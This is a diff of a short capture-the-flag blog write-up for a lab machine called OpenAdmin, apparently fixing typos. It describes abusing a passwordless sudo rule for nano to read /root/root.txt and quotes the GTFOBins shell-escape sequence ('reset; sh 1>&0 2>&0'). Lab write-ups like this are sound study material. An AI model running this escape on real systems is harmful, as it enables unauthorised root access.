d3b4g/leonids/_posts/openadmin.md

 Standard enumeration was enough for this machine,sudo -l command shows that user Joanna can run /bin/nano /opt/priv as the root user without entering a password.
 ![source-01](/img/Screenshot_2020-05-03_06-55-35.png){: .align-left}

-Reading root.txt is pretty straight forward, this technique is already well document in GTFBIN
+Reading root.txt is pretty straight forward, this technique is already well document in GTFOBins

-> t can be used to break out from restricted environments by spawning an interactive system shell.
->nano
->^R^X
->reset; sh 1>&0 2>&0

 sudo /bin/nano /opt/priv.
-Then we type <CTRL>+R /root/root.txt in order to read a file.
+Then we type <CTRL>+R /root/root.txt in order to read root.txt file.

 OpenAdmin is rooted!